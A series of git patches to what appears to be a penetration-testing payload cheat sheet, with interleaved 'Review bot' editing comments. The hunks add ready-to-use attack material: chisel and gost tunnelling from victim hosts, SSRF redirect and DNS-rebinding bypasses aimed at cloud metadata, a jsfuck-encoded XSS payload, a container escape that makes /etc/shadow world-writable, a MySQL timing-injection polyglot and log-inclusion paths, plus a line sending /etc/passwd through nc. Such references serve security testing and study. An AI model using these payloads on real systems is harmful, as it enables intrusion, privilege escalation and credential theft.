@@ -146,4 +171,5 @@ $ docker run --rm cve-2019-5736:malicious_image_POC - [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) - [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) - [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) -- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) \ No newline at end of file +- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) +- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 78958b0..cd4bc9e 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -12,6 +12,8 @@ * [Metasploit](#metasploit) * [sshuttle](#sshuttle) * [chisel](#chisel) + * [SharpChisel](#sharpchisel) +* [gost](#gost) * [Rpivot](#rpivot) * [RevSocks](#revsocks) * [plink](#plink) 
@@ -170,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost: user@hacker$ /opt/chisel/chisel server -p 8008 --reverse ``` +### SharpChisel + +A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel + +```powershell +user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com" +================================================================ +server : run the Server Component of chisel +-p 8080 : run server on port 8080 +--key "private": use "private" string to seed the generation of a ECDSA public and private key pair +--auth "user:pass" : Creds required to connect to the server +--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes. +--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight. + +user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks +``` + +## Gost + +> Wiki English : https://docs.ginuerzh.xyz/gost/en/ + +```powershell +git clone https://github.com/ginuerzh/gost +cd gost/cmd/gost +go build + +# Socks5 Proxy +Server side: gost -L=socks5://:1080 +Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true + +# Local Port Forward +gost -L=tcp://:2222/192.168.1.1:22 [-F=..] +``` + ## Rpivot Server (Attacker box) 
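Review bot: in the SharpChisel hunk, the lines between the `====` separator and the `user@victim$` command are prose explanations of each flag, not commands, yet they sit inside the `powershell` fence; prefix them with `#` or move them to a list under the fence so a copy-paste does not pick them up.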
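Review bot: the Gost hunk puts `Server side:` and `Client side:` labels in front of the commands inside the fence, which makes those two lines unrunnable as written; turn the labels into `#` comments like the `# Socks5 Proxy` line just above them. The `?notls=true` suffix on the client command also deserves a comment, since it disables TLS on the client-to-server hop.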
@@ -305,4 +341,5 @@ unzip ngrok-stable-linux-amd64.zip * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) -* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) \ No newline at end of file +* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) +* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 38318b2..19ba16e 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -33,6 +33,7 @@ * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi) * [SSRF exploiting Redis](#ssrf-exploiting-redis) * [SSRF to XSS](#ssrf-to-xss) +* [SSRF from XSS](#ssrf-from-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs) 
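Review bot: the new SharpChisel reference is dated "Jun 8" with no year, unlike the neighbouring entries; add the year so the list stays consistently dated.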
@@ -426,6 +427,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg ``` +## SSRF from XSS + +### Using an iframe + +The content of the file will be integrated inside the PDF as an image or text. + +```html + +``` + +### Using an attachment + +Example of a PDF attachment using HTML + +1. use `` as Bio text +2. use 'Download Data' feature to get PDF +3. use `pdfdetach -saveall filename.pdf` to extract embedded resource +4. `cat attachment.bin` + ## SSRF URL for Cloud Instances ### SSRF URL for AWS Bucket From 6d37ad9e2e8c9b7d84ffcbacb31ae88b59f70432 Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sun, 21 Jun 2020 16:19:15 -0500 Subject: [PATCH 73/85] Improved Clarity of ssrf redirect --- Server Side Request Forgery/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 19ba16e..161e267 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -79,11 +79,11 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit [using a redirection](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) +Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) ```powershell -1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com -2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 ``` From c39c904c9a6ff204f326072fb406eb0220563c66 Mon Sep 17 00:00:00 2001 
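Review bot: in the "SSRF from XSS" hunk the `html` fence and the inline code in step 1 ("use `` as Bio text") are both empty as displayed, so the iframe and attachment payloads the prose describes are missing here; please verify that the committed file actually contains them (if they were stripped as raw HTML by the renderer, escape the tags in the source).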
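Review bot: step 1 of the redirect hunk still reads oddly after the rewrite: "redirects requests to the SSRF the target URL (e.g. 192.168.0.1)"; "to the SSRF" looks like an editing leftover, so suggest "redirects requests to the target URL (e.g. 192.168.0.1)".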
From: Alex Lauerman Date: Sun, 21 Jun 2020 16:27:32 -0500 Subject: [PATCH 74/85] Moved bypasses under the bypasses section --- Server Side Request Forgery/README.md | 32 +++++++++++++-------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 161e267..d130656 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -79,22 +79,6 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) - -```powershell -1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) -2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP -vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 -``` - -Advanced exploit using type=url - -```powershell -Change "type=file" to "type=url" -Paste URL in text field and hit enter -Using this vulnerability users can upload images from any image URL = trigger an SSRF -``` - ## Bypassing filters ### Bypass using HTTPS 
@@ -237,6 +221,22 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) +### Bypassing using other tricks +[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) + +```powershell +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP +vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 +``` + +Using type=url + +```powershell +Change "type=file" to "type=url" +Paste URL in text field and hit enter +Using this vulnerability users can upload images from any image URL = trigger an SSRF +``` ## SSRF exploitation via URL Scheme From d5c1f39c0f61702bca90297929e26bc9b90318d8 Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sun, 21 Jun 2020 16:31:16 -0500 Subject: [PATCH 75/85] Added DNS Rebinding --- Server Side Request Forgery/README.md | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index d130656..0b889ec 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -221,7 +221,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) -### Bypassing using other tricks +### Bypassing using a redirect [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) ```powershell 
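Review bot: the relocated block under `### Bypassing using other tricks` carries the sentence "redirects requests to the SSRF the target URL" over unchanged, and there is no blank line between the heading and the `[using a redirect]` link line, unlike the other headings in this file; worth fixing both while the block is being moved.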
@@ -230,7 +230,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/ vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 ``` -Using type=url +### Bypassing using type=url ```powershell Change "type=file" to "type=url" @@ -238,6 +238,14 @@ Paste URL in text field and hit enter Using this vulnerability users can upload images from any image URL = trigger an SSRF ``` +### Bypassing using DNS Rebinding (TOCTOU) + +```powershell +Create a domain that change between two IPs. http://1u.ms/ exists for this purpose. +For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain: +make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms +``` + ## SSRF exploitation via URL Scheme ### File From 7aef550c39a10db8ea7c5408e887d100ec0972ae Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Mon, 22 Jun 2020 15:53:07 +0200 Subject: [PATCH 76/85] XXE ref. refactor - Add new refs - Format title with date, author, etc. - Remove dead hosts: - agrawalsmart7.com - esoln.net --- XXE Injection/README.md | 28 ++++++++++++++-------------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b12c8c7..2c3623c 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
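Review bot: in the DNS-rebinding hunk, "a domain that change between two IPs" should be "changes", and the prose line "rotate between 1.2.3.4 and 169.254-169.254" should spell the metadata address as 169.254.169.254; the hyphenated form belongs only in the `make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms` hostname encoding. Since the heading labels this TOCTOU, one sentence on why it works (the filter resolves the name once and approves it, then the fetcher resolves it again and gets the internal address) and on the fix (resolve once, validate the resulting IP, and connect to that IP rather than the hostname) would give a defender something to act on.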
@@ -511,22 +511,22 @@ updating: xl/sharedStrings.xml (deflated 17%) ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) -* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) -* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) -* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) +* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka +* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) +* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) * [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) * [XXE ALL THE THINGS!!! 
(including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) -* [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html) * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) -* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify -* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht -* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) -* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) -* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) -* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) +* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify +* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht +* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals +* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017 +* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) -* [Exploiting XXE with local DTD files - 
Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) +* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) -- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) -- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) +* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau +* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) +* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon +* [SynAcktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Juien SZLAMOWICZ, Sebastien DUDEK From e37aff2fcd64748bdf1b8b213e7d98898f5a3734 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Tue, 23 Jun 2020 14:26:46 +0000 Subject: [PATCH 77/85] Add useful always existing windows file Adding always existing file in recent Windows machine. Ideal to test path traversal but nothing much interesting inside --- Directory Traversal/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) 
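Review bot: The hunk drops the "Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal" entry without the commit saying why; if the link is dead, state that in the message (or keep the entry with an archived URL) so the removal is visibly deliberate. Two smaller points in the added lines: "Juien SZLAMOWICZ" in the SynAcktiv entry looks like a typo for "Julien", and the date/author suffixes now mix formats ("- 6. Nov. 2014 - Von ...", "April 11, 2014 by detectify", "01/2017", "JUNE 22, 2016 by YEO QUAN YANG"); pick one "- date - author" form, as the Arseniy Sharoglazov and Philippe Arteau entries already do.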
diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index ec975de..3993305 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -123,6 +123,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software ### Interesting Windows files +Always existing file in recent Windows machine. +Ideal to test path traversal but nothing much interesting inside... + +```powershell +c:\windows\system32\license.rtf +c:\windows\system32\eula.txt +``` + Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) ```powershell @@ -167,5 +175,6 @@ The following log files are controllable and can be included with an evil payloa ## References +* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/) * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) From 93a372cea42180dcc820ec56ff0fdc6c3fab3213 Mon Sep 17 00:00:00 2001 From: looCiprian Date: Tue, 23 Jun 2020 18:34:02 +0200 Subject: [PATCH 78/85] Add jsfuck bypassing method to xss cheat sheet --- XSS Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index ecb5a4d..9cdfe91 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -53,6 +53,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass using UTF-32](#bypass-using-utf---32) - [Bypass using BOM](#bypass-using-bom) - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) + - [Bypass using jsfuck](#bypass-using-jsfuck) - [CSP Bypass](#csp-bypass) - [Common WAF Bypass](#common-waf-bypass) 
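Review bot: "Always existing file in recent Windows machine" is a strong claim with no version behind it; name the Windows releases on which c:\windows\system32\license.rtf and c:\windows\system32\eula.txt were actually checked, and fix the grammar of the two added sentences ("Files that always exist on recent Windows machines. Ideal for confirming a path traversal, though there is nothing interesting inside."). It is also worth one clause saying why these are preferred over the larger list below: a read of a known, harmless file confirms the traversal without touching sensitive data.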
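Review bot: The new reference "Path Traversal Cheat Sheet: Windows" is inserted at the top of the list without the source/date suffix the other entries carry (e.g. "- CWE Mitre - December 27, 2018"); add the site and date and append it in the existing order so the list stays consistent.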
@@ -934,6 +935,14 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o ``` +### Bypass using jsfuck + +Bypass using [jsfuck](http://www.jsfuck.com/) + +```javascript +[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() +``` + ## CSP Bypass Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) From f86837ca8c3afe511ba10f5a82d418f3d8dc7ce7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 24 Jun 2020 12:10:41 +0200 Subject: [PATCH 79/85] Fix #211 --- SQL Injection/PostgreSQL Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
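Review bot: The section body only repeats the heading, so a reader cannot tell what the encoded expression evaluates to, what kind of filter it is meant for (jsfuck encodes JavaScript using only the six characters []()!+, so it targets filters that key on alphanumerics), or how to regenerate it. State the plaintext that this output corresponds to above the block and that it was produced with the linked tool, so the 1 KB string can be verified instead of pasted blindly; the jsfuck.com link should also use https.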
diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index d21dfca..e25c1c5 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -208,5 +208,5 @@ SELECT system('cat /etc/passwd | nc '); * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) -* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) +* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) * [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) From 5b1a79cb56ce5b8de6c9b2458d87f800c6dfd78f Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 4 Jul 2020 19:00:56 +0200 Subject: [PATCH 80/85] Docker device file breakout --- .../Container - Docker Pentest.md | 11 +++++++++++ SQL Injection/README.md | 3 +++ 2 files changed, 14 insertions(+) diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index 55b3cb3..b8faaa3 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md 
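Review bot: The only change is the reference URL (hyphenated "9-x" and a trailing slash), but the commit message "Fix #211" does not say that the previous link was broken; a message such as "Fix dead dionach.com link (#211)" would make the history self-explanatory.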
@@ -10,6 +10,7 @@ - [Insecure Docker Registry](#insecure-docker-registry) - [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) - [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) +- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file) - [References](#references) ## Tools @@ -164,6 +165,16 @@ $ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicio $ docker run --rm cve-2019-5736:malicious_image_POC ``` +## Breaking out of containers using a device file + +```powershell +https://github.com/FSecureLABS/fdpasser +In container, as root: ./fdpasser recv /moo /etc/shadow +Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo +Outside container: ls -la /etc/shadow +Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow +``` + ## References - [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 353feca..693ed56 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -387,6 +387,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj. ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ + +/* MySQL only */ +IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ ``` ## Routed injection From d317b46af963fd82ea33ae20cdbb78cd3ed4ed05 Mon Sep 17 00:00:00 2001 
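Review bot: The new section has no prose: the tool URL sits inside the code fence, and nothing states what the technique requires (the "In container, as root" and "Outside container, as UID 1000" lines imply a host-side process that can reach the container's filesystem through /proc/<pid>/root, and `sleep 1337` is presumably a placeholder for a process running inside the container). Move the link out of the fence, add a sentence on the preconditions and on what the fdpasser recv/send pair does, and explain the "Output:" line, since "-rwsrwsrwx 1 root shadow ... /etc/shadow" only makes sense as an expected result if the text says how the mode of /etc/shadow got changed. The fence language should be bash rather than powershell for a Linux shell sequence.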
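Review bot: The `/* MySQL only */` comment should say why the new payload exists: `IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))` falls back to BENCHMARK() on servers older than MySQL 5.0.12, where SLEEP() does not exist, and BENCHMARK's delay depends on server CPU speed, so the timing is less predictable than SLEEP(1). A comment saying that, and that the long line is the numeric, single-quoted and double-quoted variants glued together with /* */ and XOR like the SLEEP(1) line above it, would make it readable without decoding it.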
From: Milan Veljkovic Date: Mon, 6 Jul 2020 23:43:47 +0200 Subject: [PATCH 81/85] Update README.md I met with /var/log/apache2/ more often than /var/log/apache/ and i believe if someone is following this list, the apache2 items will make a difference. Cheers ! --- File Inclusion/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 964961a..178729e 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -289,6 +289,8 @@ Just append your PHP code into the log file by doing a request to the service (A ```powershell http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log +http://example.com/index.php?page=/var/log/apache2/access.log +http://example.com/index.php?page=/var/log/apache2/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log From 1553115e1974dcd37c1a6a6e057cacd7b8046744 Mon Sep 17 00:00:00 2001 From: marcan2020 Date: Tue, 7 Jul 2020 22:03:01 -0400 Subject: [PATCH 82/85] Add introspection without fragments --- GraphQL Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 12734ff..e602f85 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md 
